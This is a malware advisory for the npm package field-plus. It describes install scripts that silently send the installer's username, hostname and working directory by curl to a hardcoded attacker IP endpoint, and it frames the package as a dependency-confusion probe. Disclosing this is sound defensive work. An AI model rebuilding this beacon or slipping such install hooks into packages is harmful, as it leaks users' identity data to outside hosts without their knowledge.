—

MAL-2026-5777

Malicious code in field-plus (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (0112dc4801bb261e86a2f68d5fd49b6c955bb4e82f872c72e61e49cc638ca91c) package.json declares both preinstall and postinstall scripts that run curl against a hardcoded bare-IP HTTP endpoint (http://3.7.226.146:9000/callback), sending the installer's username ($(whoami)), hostname ($(hostname)), current working directory ($(pwd)), and a timestamp as query-string parameters. Output is suppressed and errors swallowed with `|| true` so the beacon stays silent during `npm install`. The tarball ships only package.json — `main: index.js` is declared but not present — so the package has no library functionality; its sole effect on installation is the identity beacon. Version 99.99.1 plus the description "testing field plus" is the canonical shape of a dependency-confusion / namespace-squat probe used to identify which organizations resolve an internal-named package from the public registry.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / field-plus

No fixed version published yet for field-plus (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/field-plus/v/99.99.1 [PACKAGE]
https://www.npmjs.com/package/field-plus/v/99.99.2 [PACKAGE]